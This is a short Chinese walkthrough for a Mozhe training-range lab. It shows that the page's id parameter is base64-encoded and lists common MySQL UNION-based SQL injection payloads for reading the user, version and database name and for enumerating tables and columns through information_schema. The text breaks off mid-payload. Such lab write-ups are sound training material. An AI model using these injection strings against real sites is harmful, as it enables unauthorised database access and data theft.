靶场地址:https://mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozhe
进入靶场详情页,点击启动靶场,根据系统提供的信息进入靶场环境。
Php注入mysql查询语句,由地址中的“?id=MQo=”可以看出,此处传递时用了base64编码,base64解码“id=MQo=”为1,常用mysql注入语句:
这里仅列出常用的信息注入语句:
暴出字段数 order by x
利用内置函数暴出用户名 and 1=2 union select 1,user()
利用内置函数暴出数据库版本 and 1=2 union select 1,version()
利用内置函数暴出数据库名称and 1=2 union select 1,database()暴出表名:and 1=2 union select 1,table_name from information_schema.tables where table_schema=database()
暴出字段名:and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x